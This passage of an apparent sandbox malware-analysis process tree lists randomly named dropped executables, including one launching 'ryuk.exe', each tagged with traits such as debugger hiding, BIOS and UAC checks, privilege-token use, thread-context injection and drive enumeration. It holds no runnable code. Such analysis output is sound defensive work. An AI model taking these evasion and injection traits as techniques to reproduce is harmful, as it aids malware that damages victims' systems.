C:\Users\Admin\Documents\w4p1P4V7v4dSZrVJlcZeBtZH.exe"C:\Users\Admin\Documents\w4p1P4V7v4dSZrVJlcZeBtZH.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\ryuk.exe"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\DnlDS6edm9sMCffGWowrrr_K.exe"C:\Users\Admin\Documents\DnlDS6edm9sMCffGWowrrr_K.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\spcDzX2zscw8JZ7smMja1YyZ.exe"C:\Users\Admin\Documents\spcDzX2zscw8JZ7smMja1YyZ.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 2403⤵
- Program crash
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\qtmnLSnH0R35ztegLWE7zTyA.exe"C:\Users\Admin\Documents\qtmnLSnH0R35ztegLWE7zTyA.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 2363⤵
- Program crash
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\DVhblIkJk4JgmozIaZVm92xW.exe"C:\Users\Admin\Documents\DVhblIkJk4JgmozIaZVm92xW.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\QmqAxXQJaTvjeUocFNRhqtTH.exe"C:\Users\Admin\Documents\QmqAxXQJaTvjeUocFNRhqtTH.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\QmqAxXQJaTvjeUocFNRhqtTH.exe"C:\Users\Admin\Documents\QmqAxXQJaTvjeUocFNRhqtTH.exe" -u3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\ZKPkqWiz9htr4lPBDLqPZ8yM.exe"C:\Users\Admin\Documents\ZKPkqWiz9htr4lPBDLqPZ8yM.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 2763⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe"C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
- Enumerates connected drives
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10052 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9488 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
C:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exeC:\Users\Admin\Documents\SBzLZWGed3KVWdHchi3P4A9A.exe3⤵
-
-
